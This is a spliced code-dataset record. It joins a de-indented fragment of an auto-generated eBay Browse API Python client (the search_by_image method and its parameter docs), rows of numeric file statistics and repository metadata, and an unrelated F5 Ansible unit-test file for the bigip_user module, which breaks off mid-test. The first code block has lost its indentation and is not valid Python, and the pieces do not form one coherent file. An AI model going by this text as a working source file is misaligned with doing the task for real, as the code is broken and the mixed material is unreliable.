:param str aspect_filter: This field lets you filter by item aspects. The aspect name/value pairs and category, which is required, is used to limit the results to specific aspects of the item. For example, in a clothing category one aspect pair would be Color/Red. <br /><br />For example, the method below uses the category ID for Women's Clothing. This will return only items for a woman's red shirt.<br /><br /><code>category_ids=15724&aspect_filter=categoryId:15724,Color:{Red}</code> <br /><br /><b>Required: </b> The category ID is required <i>twice</i>; once as a URI parameter and as part of the <b> aspect_filter</b>. For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/buy/browse/types/gct:AspectFilter
:param str category_ids: The category ID is used to limit the results. This field can have one category ID or a comma separated list of IDs. <br /><br /><span class=\"tablenote\"><b> Note: </b>Currently, you can pass in only one category ID per request.</span> <br /> <br />You can also use any combination of the <b> category_Ids</b> and <b> epid</b> fields. This gives you additional control over the result set.<br /> <br />The list of eBay category IDs is not published and category IDs are not the same across all the eBay marketplaces. You can use the following techniques to find a category by site: <ul> <li>Use the <a href=\"https://pages.ebay.com/sellerinformation/news/categorychanges.html\" target=\"_blank\">Category Changes page</a>.</li> <li>Use the Taxonomy API. For details see <a href=\"/api-docs/buy/buy-categories.html\">Get Categories for Buy APIs</a>. </li> <li>Submit the following method to get the <b> dominantCategoryId</b> for an item. <br /><code>/buy/browse/v1/item_summary/search?q=<em > keyword</em>&fieldgroups=ASPECT_REFINEMENTS </code></li></ul> <b> Required: </b> The method must have <b> category_ids</b> or <b> epid</b> (or any combination of these)
:param str charity_ids: The charity ID is used to limit the results to only items associated with the specified charity. This field can have one charity ID or a comma separated list of IDs. The method will return all the items associated with the specified charities.<br /><br /> <b>For example:</b><br /><code>/buy/browse/v1/item_summary/search?charity_ids=13-1788491,300108469</code><br /><br />The charity ID is the charity's registration ID, also known as the Employer Identification Number (EIN). In GB, it is the Charity Registration Number (CRN), commonly called \"Charity Number\". <ul><li>To find the charities eBay supports, you can search for a charity at <a href=\"https://charity.ebay.com/search\" target=\"_blank\">Charity Search </a> or go to <a href=\"https://www.ebay.com/b/Charity/bn_7114598164\" target=\"_blank\">Charity Shop</a>.</li> <li>To find the charity ID of a specific charity, click on a charity and use the EIN number. For example, the charity ID for <a href=\"https://charity.ebay.com/charity/American-Red-Cross/3843\" target=\"_blank\">American Red Cross</a>, is <code>530196605</code>.</li></ul> You can also use any combination of the <code>category_Ids</code> and <code>q</code> fields with a <code>charity_Ids</code> to filter the result set. This gives you additional control over the result set. <br /><br /><b>Restriction: </b> This is supported only on the US and GB marketplaces.<br /><br /><b>Maximum: </b> 20 IDs <br /><br /><b>Required:</b> One ID
:param str fieldgroups: This field is a comma separated list of values that lets you control what is returned in the response. The default is <b> MATCHING_ITEMS</b>, which returns the items that match the keyword or category specified. The other values return data that can be used to create histograms or provide additional information. <br /><br /><b> Valid Values: </b> <ul> <li><b> ASPECT_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.aspectDistributions\">aspectDistributions</a> container, which has the <b> dominantCategoryId</b>, <b> matchCount</b>, and <b> refinementHref</b> for the various aspects of the items found. For example, if you searched for 'Mustang', some of the aspect would be <b> Model Year</b>, <b> Exterior Color</b>, <b> Vehicle Mileage</b>, etc. <br /> <br /><span class=\"tablenote\"> <b>Note: </b> ASPECT_REFINEMENTS are category specific.</span> <br /><br /></li> <li><b> BUYING_OPTION_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.buyingOptionDistributions\">buyingOptionDistributions</a> container, which has the <b> matchCount</b> and <b> refinementHref</b> for <b> AUCTION</b> and <b> FIXED_PRICE</b> (Buy It Now) items. <br /><br /><span class=\"tablenote\"> <b>Note: </b>Classified items are not supported and only \"Buy It Now\" (non-auction) items are returned.</span> <br /><br /> </li> <li><b> CATEGORY_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.categoryDistributions\">categoryDistributions</a> container, which has the categories that the item is in. </li> <li><b> CONDITION_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.conditionDistributions\">conditionDistributions</a> container, such as <b> NEW</b>, <b> USED</b>, etc. Within these groups are multiple states of the condition. For example, <b> New </b> can be New without tag, New in box, New without box, etc. </li> <li><b> EXTENDED</b> - This returns the <a href=\"/api-docs/buy/browse/resources/item_summary/methods/search#response.itemSummaries.shortDescription\">shortDescription</a> field, which provides condition and item aspect information and the <a href=\"/api-docs/buy/browse/resources/item_summary/methods/search#response.itemSummaries.itemLocation.city\">itemLocation.city</a> field. </li> <li><b> MATCHING_ITEMS</b> - This is meant to be used with one or more of the refinement values above. You use this to return the specified refinements and all the matching items. </li> <li><b> FULL </b> - This returns all the refinement containers and all the matching items.</li> </ul> Code so that your app gracefully handles any future changes to this list. <br /><br /><b>Default: </b> MATCHING_ITEMS
:param str filter: This field supports multiple field filters that can be used to limit/customize the result set. <br /><br /><b> For example: </b><br /><code>/buy/browse/v1/item_summary/search?q=shirt&filter=price:[10..50]</code><br /><br />You can also combine filters. <br /><code>/buy/browse/v1/item_summary/search?q=shirt&filter=price:[10..50],sellers:{rpseller|bigSal} </code> <br /><br />The following are the supported filters. For details and examples for all the filters, see <a href=\"/api-docs/buy/static/ref-buy-browse-filters.html\">Buy API Field Filters</a>. <div style=\"overflow-x:auto;\"> <table> <tr> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#bidCount\">bidCount</a> </li><li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#buyingOptions\">buyingOptions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#charityOnly\">charityOnly</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#conditionIds\">conditionIds</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#conditions\">conditions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryCountry\">deliveryCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryOptions\">deliveryOptions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryPostalCode\">deliveryPostalCode</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#excludeCategoryIds\">excludeCategoryIds</a> </li> </ul></td> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#excludeSellers\">excludeSellers</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#guaranteedDeliveryInDays\">guaranteedDeliveryInDays</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemEndDate\">itemEndDate</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemLocationCountry\">itemLocationCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemStartDate\">itemStartDate</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#maxDeliveryCost\">maxDeliveryCost</a></li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#paymentMethods\">paymentMethods</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupCountry\">pickupCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupPostalCode\">pickupPostalCode</a> </li> </ul> </td> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupRadius\">pickupRadius</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupRadiusUnit\">pickupRadiusUnit</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#price\">price</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#priceCurrency\">priceCurrency</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#qualifiedPrograms\">qualifiedPrograms</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#returnsAccepted\">returnsAccepted</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#sellerAccountTypes\">sellerAccountTypes</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#sellers\">sellers</a> </li> </ul></td> </tr> </table> </div> For implementation help, refer to eBay API documentation at 
https://developer.ebay.com/api-docs/buy/browse/types/cos:FilterField
:param str limit: The number of items, from the result set, returned in a single page. <br /><br /><b> Default:</b> 50 <br /> <br /><b> Maximum number of items per page (limit): </b>200 <br /> <br /> <b> Maximum number of items in a result set: </b> 10,000
:param str offset: The number of items to skip in the result set. This is used with the <b> limit</b> field to control the pagination of the output. <br /><br />If <b> offset</b> is 0 and <b> limit</b> is 10, the method will retrieve items 1-10 from the list of items returned, if <b> offset</b> is 10 and <b> limit</b> is 10, the method will retrieve items 11 thru 20 from the list of items returned. <br /><br /><b> Valid Values</b>: 0-10,000 (inclusive) <br /> <br /> <b> Default:</b> 0 <br /> <br /> <b> Maximum number of items returned: </b> 10,000
:param str sort: Specifies the order and the field name to use to sort the items. <br /><br />You can sort items by price (in ascending or descending order) or by distance (only applicable if the <a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupCountry\">\"pickup\" filters</a> are used, and only ascending order is supported). You can also sort items by listing date, with the most recently listed (newest) items appearing first.<br /><br /><span class=\"tablenote\"><b>Note: </b> To sort in descending order, insert a hyphen (<code>-</code>) before the field name. If no <b>sort</b> parameter is submitted, the result set is sorted by "<a href=\"https://pages.ebay.com/help/sell/searchstanding.html\" target=\"_blank\">Best Match</a>".</span><br /><br />The following are examples of using the <b> sort</b> query parameter.<br /><br /><table><tr><th>Sort</th><th>Result</th> </tr> <tr> <td><code>sort=price</code></td> <td> Sorts by <b> price</b> in ascending order (lowest price first)</td> </tr> <tr> <td><code>sort=-price</code></td> <td> Sorts by <b> price</b> in descending order (highest price first)</td> </tr> <tr> <td><code>sort=distance</code></td> <td> Sorts by <b> distance</b> in ascending order (shortest distance first)</td> </tr> <tr> <td><code>sort=newlyListed</code></td> <td>Sorts by <b>listing date</b> (most recently listed/newest items first)</td> </tr> <tr> <td><code>sort=endingSoonest</code></td> <td>Sorts by <b>date/time</b> the listing ends (listings nearest to end date/time first)</td> </tr> </table> <br /><b> Default: </b> Ascending For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/buy/browse/types/cos:SortField
:return: SearchPagedCollection
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'aspect_filter', 'category_ids', 'charity_ids', 'fieldgroups', 'filter', 'limit', 'offset', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_by_image" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'aspect_filter' in params:
query_params.append(('aspect_filter', params['aspect_filter'])) # noqa: E501
if 'category_ids' in params:
query_params.append(('category_ids', params['category_ids'])) # noqa: E501
if 'charity_ids' in params:
query_params.append(('charity_ids', params['charity_ids'])) # noqa: E501
if 'fieldgroups' in params:
query_params.append(('fieldgroups', params['fieldgroups'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/item_summary/search_by_image', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchPagedCollection', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
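# A minimal sketch, not part of the generated file: a hypothetical call
# pattern following the docstrings above; `image_b64` stands in for a real
# Base64-encoded image string and the dict body for a SearchByImageRequest.
def example_image_search(image_b64):
    api = SearchByImageApi()  # builds a default ApiClient() when none given
    return api.search_by_image(
        body={'image': image_b64},  # request payload per the body parameter
        category_ids='15724',       # example category ID from the docstring
        limit='50',
    )  # returns a SearchPagedCollection, per the :return: documentation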
| 241.360248
| 3,642
| 0.701974
| 6,059
| 38,859
| 4.462288
| 0.091929
| 0.019048
| 0.02737
| 0.031956
| 0.895292
| 0.886082
| 0.878648
| 0.872175
| 0.872175
| 0.872175
| 0
| 0.009908
| 0.145449
| 38,859
| 160
| 3,643
| 242.86875
| 0.804288
| 0.894465
| 0
| 0.026316
| 0
| 0
| 0.185294
| 0.034118
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039474
| false
| 0
| 0.052632
| 0
| 0.144737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4a346d546f3ee7d17b3a889d2b79aa681f31da59
| 29,572
|
py
|
Python
|
venv/lib/python3.6/site-packages/ansible_collections/f5networks/f5_modules/tests/unit/modules/network/f5/test_bigip_user.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 1
|
2020-01-22T13:11:23.000Z
|
2020-01-22T13:11:23.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/f5networks/f5_modules/tests/unit/modules/network/f5/test_bigip_user.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 12
|
2020-02-21T07:24:52.000Z
|
2020-04-14T09:54:32.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/f5networks/f5_modules/tests/unit/modules/network/f5/test_bigip_user.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
if sys.version_info < (2, 7):
pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7")
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.f5networks.f5_modules.plugins.modules.bigip_user import (
Parameters, ModuleManager, ArgumentSpec, UnpartitionedManager, PartitionedManager
)
from ansible_collections.f5networks.f5_modules.plugins.module_utils.common import F5ModuleError
from ansible_collections.f5networks.f5_modules.tests.unit.compat import unittest
from ansible_collections.f5networks.f5_modules.tests.unit.compat.mock import Mock, patch
from ansible_collections.f5networks.f5_modules.tests.unit.modules.utils import set_module_args
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
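# load_fixture memoizes parsed fixtures in fixture_data, so each JSON file
# under fixtures/ is read and decoded at most once per test run.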
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
access = [{'name': 'Common', 'role': 'guest'}]
args = dict(
username_credential='someuser',
password_credential='testpass',
full_name='Fake Person',
partition_access=access,
update_password='always'
)
p = Parameters(params=args)
assert p.username_credential == 'someuser'
assert p.password_credential == 'testpass'
assert p.full_name == 'Fake Person'
assert p.partition_access == access
assert p.update_password == 'always'
def test_api_parameters(self):
access = [{'name': 'Common', 'role': 'guest'}]
args = dict(
name='someuser',
description='Fake Person',
partitionAccess=access,
shell='none'
)
p = Parameters(params=args)
assert p.name == 'someuser'
assert p.full_name == 'Fake Person'
assert p.partition_access == access
assert p.shell == 'none'
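# The two tests above exercise both directions of Parameters' key mapping:
# module-style names (full_name, partition_access) and API-style names
# (description, partitionAccess) resolve to the same normalized properties.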
class TestManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
self.p2 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_user.tmos_version')
self.p3 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_user.send_teem')
self.m2 = self.p2.start()
self.m2.return_value = '14.1.0'
self.m3 = self.p3.start()
self.m3.return_value = True
def tearDown(self):
self.p2.stop()
self.p3.stop()
def test_create_user(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['Common:guest'],
update_password='on_create',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.create_on_device = Mock(return_value=True)
pm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['Common:guest']
def test_create_user_no_password(self, *args):
set_module_args(dict(
username_credential='someuser',
partition_access=['Common:guest'],
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.create_on_device = Mock(return_value=True)
pm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['Common:guest']
def test_create_user_partition_access_raises(self, *args):
set_module_args(dict(
username_credential='someuser',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.create_on_device = Mock(return_value=True)
pm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
msg = "The 'partition_access' option " \
"is required when creating a resource."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
def test_create_user_shell_bash(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['all:admin'],
update_password='on_create',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.create_on_device = Mock(return_value=True)
pm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['all:admin']
def test_create_user_shell_not_permitted_raises(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['Common:guest'],
update_password='on_create',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.create_on_device = Mock(return_value=True)
pm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
msg = "Shell access is only available to 'admin' or " \
"'resource-admin' roles."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
def test_update_user_password_no_pass(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
current = Parameters(params=load_fixture('load_auth_user_no_pass.json'))
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.exists = Mock(return_value=True)
pm.update_on_device = Mock(return_value=True)
pm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
def test_update_user_password_with_pass(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
current = Parameters(params=load_fixture('load_auth_user_with_pass.json'))
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.exists = Mock(return_value=True)
pm.update_on_device = Mock(return_value=True)
pm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
def test_update_user_shell_to_none(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='none',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
current = Parameters(
params=dict(
user='admin',
shell='tmsh'
)
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.exists = Mock(return_value=True)
pm.update_on_device = Mock(return_value=True)
pm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
assert results['shell'] == 'none'
def test_update_user_shell_to_none_shell_attribute_missing(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='none',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [{'name': 'Common', 'role': 'guest'}]
current = Parameters(
params=dict(
user='admin',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.exists = Mock(return_value=True)
pm.update_on_device = Mock(return_value=True)
pm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is False
assert 'shell' not in results  # results is a dict, so key membership (not hasattr) is the right check
def test_update_user_shell_to_bash(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [{'name': 'all', 'role': 'admin'}]
current = Parameters(
params=dict(
user='admin',
shell='tmsh',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['shell'] == 'bash'
def test_update_user_shell_to_bash_multiple_roles(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [
{'name': 'Common', 'role': 'operator'},
{'name': 'all', 'role': 'guest'}
]
current = Parameters(
params=dict(
user='admin',
shell='tmsh',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
msg = "Shell access is only available to 'admin' or " \
"'resource-admin' roles."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
class TestLegacyManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
self.p2 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_user.tmos_version')
self.p3 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_user.send_teem')
self.m2 = self.p2.start()
self.m2.return_value = '14.1.0'
self.m3 = self.p3.start()
self.m3.return_value = True
def tearDown(self):
self.p2.stop()
self.p3.stop()
def test_create_user(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['Common:guest'],
update_password='on_create',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.create_on_device = Mock(return_value=True)
upm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['Common:guest']
def test_create_user_no_password(self, *args):
set_module_args(dict(
username_credential='someuser',
partition_access=['Common:guest'],
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.create_on_device = Mock(return_value=True)
upm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['Common:guest']
def test_create_user_partition_access_raises(self, *args):
set_module_args(dict(
username_credential='someuser',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.create_on_device = Mock(return_value=True)
upm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
msg = "The 'partition_access' option " \
"is required when creating a resource."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
def test_create_user_shell_bash(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['all:admin'],
update_password='on_create',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.create_on_device = Mock(return_value=True)
upm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['all:admin']
def test_create_user_shell_not_permitted_raises(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['Common:guest'],
update_password='on_create',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.create_on_device = Mock(return_value=True)
upm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
msg = "Shell access is only available to 'admin' or " \
"'resource-admin' roles."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
def test_update_user_password(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [{'name': 'Common', 'role': 'guest'}]
current = Parameters(
params=dict(
shell='tmsh',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
def test_update_user_shell_to_none(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='none',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
